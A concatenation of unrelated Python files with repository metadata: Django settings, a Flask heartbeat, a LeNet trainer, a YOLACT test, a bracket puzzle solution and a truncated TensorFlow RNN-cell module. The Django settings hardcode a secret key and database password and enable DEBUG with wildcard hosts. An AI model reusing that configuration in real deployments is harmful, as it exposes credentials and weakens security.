14738cb6e89be7fa2dc18c2e0d95c3d9f63fcf63 | af4c325a5a20cb054f22723af9a693cdf8cda3e5 | /mysite/env/lib/python3.7/encodings/euc_kr.py | eadb6c4e18a9f3978efd0efea1024e9adac530cb | [] | no_license | myracheng/treehacks19 | aff1d6356f480dfdc4ca75f286fbcbd29c110a35 | 9e2d9195f749415eddcfabaceed0f9d911b12c7e | refs/heads/master | 2020-07-04T11:07:02.833157 | 2019-02-17T19:24:08 | 2019-02-17T19:24:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /Users/gracelu/anaconda3/lib/python3.7/encodings/euc_kr.py | [
"2018glu@tjhsst.edu"
] | 2018glu@tjhsst.edu |
24fdf4400900a69600e4a58c0e30e169a83a6651 | ec96561f6ca2ff91396a73f2622f70d8a01ee1ef | /the_school/the_school/settings.py | abe0461f80dedb0bcba387c514f6242fe11ddcfc | [] | no_license | diegolopezq95/teacher_student | d5d940d388f561542aff6bfb513cac0677cfd2a9 | d7d227eb178380393aac4ff81fca10cdeae77fd5 | refs/heads/master | 2023-08-24T22:34:42.048045 | 2020-05-28T18:08:01 | 2020-05-28T18:08:01 | 267,660,605 | 0 | 0 | null | 2021-09-22T19:06:40 | 2020-05-28T18:03:20 | JavaScript | UTF-8 | Python | false | false | 3,883 | py | """
Django settings for the_school project.
Generated by 'django-admin startproject' using Django 2.2.12.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kv=&&t)umoo#9*8r9fa*!c@%b0i7m$4e$yelm#ay_y)6mqs81q'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'classroom',
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'the_school.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
os.path.join(BASE_DIR, 'classroom/templates/'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'the_school.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'teacherstudent',
'USER': 'postgres',
'PASSWORD': 'root',
'HOST': 'localhost',
'PORT': '5432',
}
}
db_from_env = dj_database_url.config(conn_max_age=600)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
AUTH_USER_MODEL = 'classroom.User'
LOGIN_URL = 'login'
LOGIN_REDIRECT_URL = 'home'
LOGOUT_REDIRECT_URL = 'home' | [
"927@holbertonschool.com"
] | 927@holbertonschool.com |
b92dfdb9cf660d0d5f22957f0846b1b096c68a18 | e86f88bd05d2dfc3197191245a28734e0a94306c | /application/resources/app_health.py | 3ba4905a01498f419c9b5e1ea08834578798051b | [] | no_license | transreductionist/API-Project-1 | b83e008a8dcf19f690109d89b298111062f760c0 | d5ffcc5d276692d1578cea704125b1b3952beb1c | refs/heads/master | 2022-01-16T06:31:06.951095 | 2019-05-09T15:22:44 | 2019-05-09T15:22:44 | 185,820,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | """Resources entry point to test the health of the application."""
# pylint: disable=too-few-public-methods
# pylint: disable=no-self-use
from flask_api import status
from flask_restful import Resource
from application.controllers.app_health import heartbeat
class Heartbeat( Resource ):
    """Flask-RESTful resource exposing an application liveness probe."""

    def get( self ):
        """Return HTTP 200 when the heartbeat succeeds, otherwise 500."""
        healthy = heartbeat()
        code = status.HTTP_200_OK if healthy else status.HTTP_500_INTERNAL_SERVER_ERROR
        return None, code
| [
"transreductionist@gmail.com"
] | transreductionist@gmail.com |
331490a12c2610a42bcb77211770ef9334ce64b5 | 3b79f312e4949e1b91725eb89d21bc2d6ceee660 | /chapter5/LeNet.py | 0fe85dfc91af2d05c408e7c44b3ef59b3296cf05 | [] | no_license | since2016/DL-pytorch | 634b129ad9f263422975d9b1028827ea091c44fb | af6c3950966e6f7a3983e253220a20c4b7fa3bde | refs/heads/master | 2020-12-28T13:36:35.450128 | 2020-02-06T02:29:23 | 2020-02-06T02:29:23 | 238,352,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,083 | py | import time
import torch as t
from torch import nn, optim
import sys
sys.path.append("..")
from d2lzh_pytorch import *
device = t.device('cuda' if t.cuda.is_available()
else 'cpu')
class LeNet(nn.Module):
    """LeNet-5-style CNN for 28x28 single-channel images (Fashion-MNIST),
    producing 10 class scores squashed through a final sigmoid."""

    def __init__(self):
        super(LeNet, self).__init__()
        # Feature extractor: 28x28 -> (5x5 conv, pad 2) 28x28x6 -> pool 14x14
        # -> (5x5 conv) 10x10x16 -> pool 5x5x16 = 400 features.
        feature_layers = [
            nn.Conv2d(1, 6, 5, padding=2),
            nn.Sigmoid(),
            nn.MaxPool2d(2, 2),
            nn.Conv2d(6, 16, 5),
            nn.Sigmoid(),
            nn.MaxPool2d(2, 2),
        ]
        # Classifier head: 400 -> 120 -> 84 -> 10.
        classifier_layers = [
            nn.Linear(400, 120),
            nn.Sigmoid(),
            nn.Linear(120, 84),
            nn.Sigmoid(),
            nn.Linear(84, 10),
            nn.Sigmoid(),
        ]
        # Same Sequential indices as before, so state_dict keys are unchanged.
        self.conv = nn.Sequential(*feature_layers)
        self.fc = nn.Sequential(*classifier_layers)

    def forward(self, img):
        """Map ``img`` of shape (N, 1, 28, 28) to class scores of shape (N, 10)."""
        features = self.conv(img)
        flattened = features.view(features.size(0), -1)
        return self.fc(flattened)
# net = LeNet()
# print(net)
batch_size = 256
train_iter, test_iter = load_data_fashion_mnist(batch_size=batch_size)
def evaluate_accuracy(data_iter, net, device=None):
    """Return classification accuracy of `net` over all batches in `data_iter`.

    For an nn.Module the model is switched to eval mode for the forward pass
    (and back to train mode afterwards) and batches are moved to `device`,
    which defaults to the device of the model's first parameter.  A plain
    callable is invoked directly; if it accepts an `is_training` argument it
    is called with is_training=False.
    """
    if device is None and isinstance(net, torch.nn.Module):
        device = next(iter(net.parameters())).device
    correct, total = 0.0, 0
    with torch.no_grad():  # no gradients needed for evaluation
        for X, y in data_iter:
            if isinstance(net, torch.nn.Module):
                net.eval()
                preds = net(X.to(device)).argmax(dim=1)
                correct += (preds == y.to(device)).float().sum().cpu().item()
                net.train()
            elif 'is_training' in net.__code__.co_varnames:
                correct += (net(X, is_training=False).argmax(dim=1) == y).float().sum().item()
            else:
                correct += (net(X).argmax(dim=1) == y).float().sum().item()
            total += y.shape[0]
    return correct / total
def train_ch5(net, train_iter, test_iter, batch_size, optimizer, device, num_epochs):
    """Train `net` with cross-entropy loss and report per-epoch metrics.

    Args:
        net: torch.nn.Module to train (moved to `device`).
        train_iter: iterable of (X, y) training mini-batches.
        test_iter: iterable of (X, y) batches used for test accuracy.
        batch_size: kept for signature compatibility; not used directly.
        optimizer: optimizer stepping net.parameters().
        device: torch.device the model and batches are moved to.
        num_epochs: number of passes over train_iter.
    """
    net = net.to(device)
    # BUG FIX: the progress message previously read "trianing on".
    print("training on", device)
    loss = t.nn.CrossEntropyLoss()
    for epoch in range(num_epochs):
        train_l_sum, train_acc_sum, n, batch_count, start = 0.0, 0.0, 0, 0, time.time()
        for X, y in train_iter:
            X = X.to(device)
            y = y.to(device)
            y_hat = net(X)
            l = loss(y_hat, y)
            optimizer.zero_grad()
            l.backward()
            optimizer.step()
            # Accumulate running loss/accuracy as CPU scalars.
            train_l_sum += l.cpu().item()
            train_acc_sum += (y_hat.argmax(dim=1) == y).sum().cpu().item()
            n += y.shape[0]
            batch_count += 1
        test_acc = evaluate_accuracy(test_iter, net)
        print("epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.1f sec" % (
            epoch + 1, train_l_sum / batch_count, train_acc_sum / n, test_acc, time.time() - start
        ))
# Script entry: build the network and train it for a few epochs with Adam.
net = LeNet()
lr, num_epochs = 0.001, 5
optimizer = t.optim.Adam(net.parameters(), lr =lr)
train_ch5(net, train_iter, test_iter, batch_size, optimizer, device, num_epochs)
| [
"815720921@qq.com"
] | 815720921@qq.com |
a161c21ea948b07a05375c924672731065a639c1 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/tests/test_models/test_dense_heads/test_yolact_head.py | 11b74a3b9a7c7d2bae8547cf62e2ad4fdb73cec3 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 5,894 | py |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Open-MMLab. All rights reserved.
# Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import torch
from mmdet.models.dense_heads import YOLACTHead, YOLACTProtonet, YOLACTSegmHead
def test_yolact_head_loss():
    """Tests yolact head losses when truth is empty and non-empty."""
    s = 550
    img_metas = [{
        'img_shape': (s, s, 3),
        'scale_factor': 1,
        'pad_shape': (s, s, 3)
    }]
    # Training config: IoU-based anchor assignment plus negative mining
    # (neg_pos_ratio) as used by YOLACT.
    train_cfg = mmcv.Config(
        dict(
            assigner=dict(
                type='MaxIoUAssigner',
                pos_iou_thr=0.5,
                neg_iou_thr=0.4,
                min_pos_iou=0.,
                ignore_iof_thr=-1,
                gt_max_assign_all=False),
            smoothl1_beta=1.,
            allowed_border=-1,
            pos_weight=-1,
            neg_pos_ratio=3,
            debug=False,
            min_gt_box_wh=[4.0, 4.0]))
    # Box/classification head using the 5-level anchor layout of YOLACT-550.
    bbox_head = YOLACTHead(
        num_classes=80,
        in_channels=256,
        feat_channels=256,
        anchor_generator=dict(
            type='AnchorGenerator',
            octave_base_scale=3,
            scales_per_octave=1,
            base_sizes=[8, 16, 32, 64, 128],
            ratios=[0.5, 1.0, 2.0],
            strides=[550.0 / x for x in [69, 35, 18, 9, 5]],
            centers=[(550 * 0.5 / x, 550 * 0.5 / x)
                     for x in [69, 35, 18, 9, 5]]),
        bbox_coder=dict(
            type='DeltaXYWHBBoxCoder',
            target_means=[.0, .0, .0, .0],
            target_stds=[0.1, 0.1, 0.2, 0.2]),
        loss_cls=dict(
            type='CrossEntropyLoss',
            use_sigmoid=False,
            reduction='none',
            loss_weight=1.0),
        loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.5),
        num_head_convs=1,
        num_protos=32,
        use_ohem=True,
        train_cfg=train_cfg)
    segm_head = YOLACTSegmHead(
        in_channels=256,
        num_classes=80,
        loss_segm=dict(
            type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0))
    mask_head = YOLACTProtonet(
        num_classes=80,
        in_channels=256,
        num_protos=32,
        max_masks_to_train=100,
        loss_mask_weight=6.125)

    # One random FPN feature map per pyramid level (sizes match the strides).
    feat = [
        torch.rand(1, 256, feat_size, feat_size)
        for feat_size in [69, 35, 18, 9, 5]
    ]
    cls_score, bbox_pred, coeff_pred = bbox_head.forward(feat)

    # Test that empty ground truth encourages the network to predict background
    gt_bboxes = [torch.empty((0, 4))]
    gt_labels = [torch.LongTensor([])]
    gt_masks = [torch.empty((0, 550, 550))]
    gt_bboxes_ignore = None
    empty_gt_losses, sampling_results = bbox_head.loss(
        cls_score,
        bbox_pred,
        gt_bboxes,
        gt_labels,
        img_metas,
        gt_bboxes_ignore=gt_bboxes_ignore)
    # When there is no truth, the cls loss should be nonzero but there should
    # be no box loss.
    empty_cls_loss = sum(empty_gt_losses['loss_cls'])
    empty_box_loss = sum(empty_gt_losses['loss_bbox'])
    assert empty_cls_loss.item() > 0, 'cls loss should be non-zero'
    assert empty_box_loss.item() == 0, (
        'there should be no box loss when there are no true boxes')

    # Test segm head and mask head
    segm_head_outs = segm_head(feat[0])
    empty_segm_loss = segm_head.loss(segm_head_outs, gt_masks, gt_labels)
    mask_pred = mask_head(feat[0], coeff_pred, gt_bboxes, img_metas,
                          sampling_results)
    empty_mask_loss = mask_head.loss(mask_pred, gt_masks, gt_bboxes, img_metas,
                                     sampling_results)
    # When there is no truth, the segm and mask loss should be zero.
    empty_segm_loss = sum(empty_segm_loss['loss_segm'])
    empty_mask_loss = sum(empty_mask_loss['loss_mask'])
    assert empty_segm_loss.item() == 0, (
        'there should be no segm loss when there are no true boxes')
    assert empty_mask_loss == 0, (
        'there should be no mask loss when there are no true boxes')

    # When truth is non-empty then cls, box, mask, segm loss should be
    # nonzero for random inputs.
    gt_bboxes = [
        torch.Tensor([[23.6667, 23.8757, 238.6326, 151.8874]]),
    ]
    gt_labels = [torch.LongTensor([2])]
    gt_masks = [(torch.rand((1, 550, 550)) > 0.5).float()]
    one_gt_losses, sampling_results = bbox_head.loss(
        cls_score,
        bbox_pred,
        gt_bboxes,
        gt_labels,
        img_metas,
        gt_bboxes_ignore=gt_bboxes_ignore)
    one_gt_cls_loss = sum(one_gt_losses['loss_cls'])
    one_gt_box_loss = sum(one_gt_losses['loss_bbox'])
    assert one_gt_cls_loss.item() > 0, 'cls loss should be non-zero'
    assert one_gt_box_loss.item() > 0, 'box loss should be non-zero'

    one_gt_segm_loss = segm_head.loss(segm_head_outs, gt_masks, gt_labels)
    mask_pred = mask_head(feat[0], coeff_pred, gt_bboxes, img_metas,
                          sampling_results)
    one_gt_mask_loss = mask_head.loss(mask_pred, gt_masks, gt_bboxes,
                                      img_metas, sampling_results)
    one_gt_segm_loss = sum(one_gt_segm_loss['loss_segm'])
    one_gt_mask_loss = sum(one_gt_mask_loss['loss_mask'])
    assert one_gt_segm_loss.item() > 0, 'segm loss should be non-zero'
    assert one_gt_mask_loss.item() > 0, 'mask loss should be non-zero'
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
bab16b9a5e848d7a157495bd6f15f1150128eba8 | 88ec9caf2c504f83bf192ca7fac6b712b6e1c2f7 | /Move_brackets.py | 880aee2b792d98e4c1b0403671ef963506c39c4a | [] | no_license | nitinverma99/Codeforces---1000 | 69ceb3fb0ee155e1e1574d884a49412bb0854d86 | f7f388cd2319e9425d63065717c0e612d46799dc | refs/heads/master | 2023-05-11T22:28:17.987429 | 2021-06-04T19:07:00 | 2021-06-04T19:07:00 | 373,936,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | t = int(input())
while t:
    # Process one test case per iteration (t counts remaining cases).
    t -= 1
    a = int(input())  # declared sequence length; must be consumed from stdin
    s = input()
    # `depth` counts currently unmatched '('.  A ')' with no open bracket
    # available needs exactly one move, so count those in `moves`.
    # (Fixes the original's unused `ans = a // 2` and replaces the list
    # used as a character stack with a plain counter.)
    depth = 0
    moves = 0
    for ch in s:
        if ch == '(':
            depth += 1
        elif depth:
            depth -= 1
        else:
            moves += 1
    print(moves)
"nitinv0504@gmail.com"
] | nitinv0504@gmail.com |
8efa8a16057685b548dcda3c1e635a18b1e035e3 | 7a6007df5481caa5a979cded53d3789869efe767 | /rnn_cell.py | e31c46261f82225e66665f3a1eaddea3ebebbfec | [] | no_license | zerkh/seq2seq_copy | 9db72e7024cfb86930119de29562203555114d9e | b914b5a203d6136befd989449ace5244daf64ba1 | refs/heads/master | 2022-11-30T19:02:57.707342 | 2016-04-13T12:37:45 | 2016-04-13T12:37:45 | 56,070,459 | 0 | 1 | null | 2022-11-29T00:41:32 | 2016-04-12T14:30:56 | Python | UTF-8 | Python | false | false | 23,206 | py | """Module for constructing RNN Cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import math
class RNNCell(object):
  """Abstract base class for recurrent network cells.

  A cell owns a state vector of size `state_size`, consumes inputs of size
  `input_size`, and on each call produces an output of size `output_size`
  together with the next state.  This module builds common cells (GRU,
  LSTM, ...) plus wrappers adding dropout, projections or embeddings, and
  MultiRNNCell for stacking.  Subclasses implement `__call__` with the
  signature below and expose the three size properties.
  """

  def __call__(self, inputs, state, scope=None):
    """Run the cell for one step.

    Args:
      inputs: 2D Tensor with shape [batch_size x self.input_size].
      state: 2D Tensor with shape [batch_size x self.state_size].
      scope: VariableScope for the created subgraph; defaults to class name.

    Returns:
      A pair containing:
      - Output: A 2D Tensor with shape [batch_size x self.output_size]
      - New state: A 2D Tensor with shape [batch_size x self.state_size].
    """
    raise NotImplementedError("Abstract method")

  @property
  def input_size(self):
    """Integer: size of inputs accepted by this cell."""
    raise NotImplementedError("Abstract method")

  @property
  def output_size(self):
    """Integer: size of outputs produced by this cell."""
    raise NotImplementedError("Abstract method")

  @property
  def state_size(self):
    """Integer: size of state used by this cell."""
    raise NotImplementedError("Abstract method")

  def zero_state(self, batch_size, dtype):
    """Return an all-zero state tensor of shape [batch_size x state_size].

    Args:
      batch_size: int, float, or unit Tensor representing the batch size.
      dtype: the data type to use for the state.
    """
    initial = tf.zeros(
        tf.pack([batch_size, self.state_size]), dtype=dtype)
    # The dynamic shape above hides the static state size; restore it.
    initial.set_shape([None, self.state_size])
    return initial
class BasicRNNCell(RNNCell):
  """Plain (vanilla) RNN cell: a single tanh over a linear map."""

  def __init__(self, num_units):
    self._num_units = num_units

  @property
  def input_size(self):
    return self._num_units

  @property
  def output_size(self):
    return self._num_units

  @property
  def state_size(self):
    return self._num_units

  def __call__(self, inputs, state, scope=None):
    """Most basic RNN: output = new_state = tanh(W * input + U * state + B)."""
    with tf.variable_scope(scope or type(self).__name__):  # "BasicRNNCell"
      activation = tf.tanh(linear([inputs, state], self._num_units, True))
    # Output and next state are the same tensor for a vanilla RNN.
    return activation, activation
class GRUCell(RNNCell):
  """Gated Recurrent Unit cell (cf. http://arxiv.org/abs/1406.1078)."""

  def __init__(self, num_units):
    self._num_units = num_units

  @property
  def input_size(self):
    return self._num_units

  @property
  def output_size(self):
    return self._num_units

  @property
  def state_size(self):
    return self._num_units

  def __call__(self, inputs, state, scope=None):
    """Gated recurrent unit (GRU) with nunits cells."""
    with tf.variable_scope(scope or type(self).__name__):  # "GRUCell"
      with tf.variable_scope("Gates"):
        # Bias starts at 1.0 so the cell initially neither resets nor updates.
        gates = linear([inputs, state], 2 * self._num_units, True, 1.0)
        reset, update = tf.split(1, 2, gates)
        reset = tf.sigmoid(reset)
        update = tf.sigmoid(update)
      with tf.variable_scope("Candidate"):
        candidate = tf.tanh(linear([inputs, reset * state], self._num_units, True))
      # Interpolate between the old state and the candidate activation.
      new_h = update * state + (1 - update) * candidate
    return new_h, new_h
class BasicLSTMCell(RNNCell):
  """Basic LSTM recurrent network cell.

  The implementation is based on: http://arxiv.org/pdf/1409.2329v5.pdf.

  It does not allow cell clipping, a projection layer, and does not
  use peep-hole connections: it is the basic baseline.

  Biases of the forget gate are initialized by default to 1 in order to reduce
  the scale of forgetting in the beginning of the training.
  """

  def __init__(self, num_units, forget_bias=1.0):
    # forget_bias is added to the forget-gate pre-activation so training
    # starts off remembering rather than forgetting.
    self._num_units = num_units
    self._forget_bias = forget_bias

  @property
  def input_size(self):
    return self._num_units

  @property
  def output_size(self):
    return self._num_units

  @property
  def state_size(self):
    # State is the column-concatenation of cell state c and hidden state h.
    return 2 * self._num_units

  def __call__(self, inputs, state, scope=None):
    """Long short-term memory cell (LSTM)."""
    with tf.variable_scope(scope or type(self).__name__):  # "BasicLSTMCell"
      # Parameters of gates are concatenated into one multiply for efficiency.
      c, h = tf.split(1, 2, state)
      concat = linear([inputs, h], 4 * self._num_units, True)

      # i = input_gate, j = new_input, f = forget_gate, o = output_gate
      i, j, f, o = tf.split(1, 4, concat)

      new_c = c * tf.sigmoid(f + self._forget_bias) + tf.sigmoid(i) * tf.tanh(j)
      # BUG FIX: the original called the undefined bare name `sigmoid`;
      # this module only imports tensorflow and math, so that line raised
      # NameError at graph-construction time.  Use tf.sigmoid.
      new_h = tf.tanh(new_c) * tf.sigmoid(o)

    return new_h, tf.concat(1, [new_c, new_h])
def _get_sharded_variable(name, shape, initializer, dtype, num_shards):
  """Create `num_shards` column-shards of a [shape[0], shape[1]] variable.

  Each shard is named `name_<i>`; the last shard may be narrower when
  shape[1] does not divide evenly by num_shards.
  """
  shard_cols = int(math.ceil(shape[1] / num_shards))
  return [
      tf.get_variable(name + "_%d" % i,
                      [shape[0], min(shard_cols, shape[1] - shard_cols * i)],
                      initializer=initializer, dtype=dtype)
      for i in range(num_shards)
  ]
def _matmul_with_sharded_variable(tensor, sharded_tensor):
  """Multiply `tensor` by every shard and concatenate results along columns."""
  pieces = []
  for shard in sharded_tensor:
    pieces.append(tf.matmul(tensor, shard))
  return tf.concat(1, pieces)
class LSTMCell(RNNCell):
  """Long short-term memory unit (LSTM) recurrent network cell.

  This implementation is based on:

    https://research.google.com/pubs/archive/43905.pdf

  Hasim Sak, Andrew Senior, and Francoise Beaufays.
  "Long short-term memory recurrent neural network architectures for
   large scale acoustic modeling." INTERSPEECH, 2014.

  It uses peep-hole connections, optional cell clipping, and an optional
  projection layer.
  """

  def __init__(self, num_units, input_size,
               use_peepholes=False, cell_clip=None,
               initializer=None, num_proj=None,
               num_unit_shards=1, num_proj_shards=1):
    """Initialize the parameters for an LSTM cell.

    Args:
      num_units: int, The number of units in the LSTM cell
      input_size: int, The dimensionality of the inputs into the LSTM cell
      use_peepholes: bool, set True to enable diagonal/peephole connections.
      cell_clip: (optional) A float value, if provided the cell state is clipped
        by this value prior to the cell output activation.
      initializer: (optional) The initializer to use for the weight and
        projection matrices.
      num_proj: (optional) int, The output dimensionality for the projection
        matrices.  If None, no projection is performed.
      num_unit_shards: How to split the weight matrix.  If >1, the weight
        matrix is stored across num_unit_shards.
      num_proj_shards: How to split the projection matrix.  If >1, the
        projection matrix is stored across num_proj_shards.
    """
    self._num_units = num_units
    self._input_size = input_size
    self._use_peepholes = use_peepholes
    self._cell_clip = cell_clip
    self._initializer = initializer
    self._num_proj = num_proj
    self._num_unit_shards = num_unit_shards
    self._num_proj_shards = num_proj_shards

    # With a projection layer the recurrent output m has size num_proj,
    # so the packed state [c | m] is num_units + num_proj wide.
    if num_proj:
      self._state_size = num_units + num_proj
      self._output_size = num_proj
    else:
      self._state_size = 2 * num_units
      self._output_size = num_units

  @property
  def input_size(self):
    return self._input_size

  @property
  def output_size(self):
    return self._output_size

  @property
  def state_size(self):
    return self._state_size

  def __call__(self, input_, state, scope=None):
    """Run one step of LSTM.

    Args:
      input_: input Tensor, 2D, batch x num_units.
      state: state Tensor, 2D, batch x state_size.
      scope: VariableScope for the created subgraph; defaults to "LSTMCell".

    Returns:
      A tuple containing:
      - A 2D, batch x output_dim, Tensor representing the output of the LSTM
        after reading "input_" when previous state was "state".
        Here output_dim is:
           num_proj if num_proj was set,
           num_units otherwise.
      - A 2D, batch x state_size, Tensor representing the new state of LSTM
        after reading "input_" when previous state was "state".
    """
    num_proj = self._num_units if self._num_proj is None else self._num_proj

    # Unpack the state: first num_units columns are c, the rest are m.
    c_prev = tf.slice(state, [0, 0], [-1, self._num_units])
    m_prev = tf.slice(state, [0, self._num_units], [-1, num_proj])

    dtype = input_.dtype

    with tf.variable_scope(scope or type(self).__name__):  # "LSTMCell"
      sharded_w = _get_sharded_variable(
          "W", [self.input_size + num_proj, 4 * self._num_units],
          self._initializer, dtype, self._num_unit_shards)

      b = tf.get_variable(
          "B", shape=[4 * self._num_units],
          initializer=tf.zeros_initializer, dtype=dtype)

      # i = input_gate, j = new_input, f = forget_gate, o = output_gate
      cell_inputs = tf.concat(1, [input_, m_prev])
      lstm_matrix = tf.nn.bias_add(
          _matmul_with_sharded_variable(cell_inputs, sharded_w), b)
      i, j, f, o = tf.split(1, 4, lstm_matrix)

      # Diagonal connections (peepholes from the cell state into the gates).
      if self._use_peepholes:
        w_f_diag = tf.get_variable(
            "W_F_diag", shape=[self._num_units],
            initializer=self._initializer,
            dtype=dtype)
        w_i_diag = tf.get_variable(
            "W_I_diag", shape=[self._num_units],
            initializer=self._initializer,
            dtype=dtype)
        w_o_diag = tf.get_variable(
            "W_O_diag", shape=[self._num_units],
            initializer=self._initializer,
            dtype=dtype)

      # The +1 mirrors BasicLSTMCell's forget_bias=1.0 default.
      if self._use_peepholes:
        c = (tf.sigmoid(f + 1 + w_f_diag * c_prev) * c_prev +
             tf.sigmoid(i + w_i_diag * c_prev) * tf.tanh(j))
      else:
        c = (tf.sigmoid(f + 1) * c_prev + tf.sigmoid(i) * tf.tanh(j))

      if self._cell_clip is not None:
        c = tf.clip_by_value(c, -self._cell_clip, self._cell_clip)

      if self._use_peepholes:
        # BUG FIX: the original called the undefined bare name `tanh` here;
        # the module imports only tensorflow and math, so the peephole path
        # raised NameError.  Use tf.tanh like the non-peephole branch.
        m = tf.sigmoid(o + w_o_diag * c) * tf.tanh(c)
      else:
        m = tf.sigmoid(o) * tf.tanh(c)

      if self._num_proj is not None:
        sharded_w_proj = _get_sharded_variable(
            "W_P", [self._num_units, self._num_proj], self._initializer,
            dtype, self._num_proj_shards)

        m = _matmul_with_sharded_variable(m, sharded_w_proj)

    return m, tf.concat(1, [c, m])
class OutputProjectionWrapper(RNNCell):
  """Wrap an RNNCell with a learned linear projection on its output.

  Note: it is often more efficient to skip this wrapper and instead project
  the time-concatenated outputs of the whole sequence in one matmul, then
  split (or feed directly into a softmax).
  """

  def __init__(self, cell, output_size):
    """Create a cell with output projection.

    Args:
      cell: an RNNCell, a projection to output_size is added to it.
      output_size: integer, the size of the output after projection.

    Raises:
      TypeError: if cell is not an RNNCell.
      ValueError: if output_size is not positive.
    """
    if not isinstance(cell, RNNCell):
      raise TypeError("The parameter cell is not RNNCell.")
    if output_size < 1:
      raise ValueError("Parameter output_size must be > 0: %d." % output_size)
    self._cell = cell
    self._output_size = output_size

  @property
  def input_size(self):
    return self._cell.input_size

  @property
  def output_size(self):
    return self._output_size

  @property
  def state_size(self):
    return self._cell.state_size

  def __call__(self, inputs, state, scope=None):
    """Run the cell and output projection on inputs, starting from state."""
    cell_output, new_state = self._cell(inputs, state)
    # Default scope: "OutputProjectionWrapper"
    with tf.variable_scope(scope or type(self).__name__):
      projected = linear(cell_output, self._output_size, True)
    return projected, new_state
class InputProjectionWrapper(RNNCell):
  """Wrap an RNNCell with a learned linear projection on its input.

  Note: it is often more efficient to skip this wrapper and instead project
  the time-concatenated inputs of the whole sequence in one matmul, then
  split the result.
  """

  def __init__(self, cell, input_size):
    """Create a cell with input projection.

    Args:
      cell: an RNNCell, a projection of inputs is added before it.
      input_size: integer, the size of the inputs before projection.

    Raises:
      TypeError: if cell is not an RNNCell.
      ValueError: if input_size is not positive.
    """
    if not isinstance(cell, RNNCell):
      raise TypeError("The parameter cell is not RNNCell.")
    if input_size < 1:
      raise ValueError("Parameter input_size must be > 0: %d." % input_size)
    self._cell = cell
    self._input_size = input_size

  @property
  def input_size(self):
    return self._input_size

  @property
  def output_size(self):
    return self._cell.output_size

  @property
  def state_size(self):
    return self._cell.state_size

  def __call__(self, inputs, state, scope=None):
    """Project the inputs, then run the wrapped cell."""
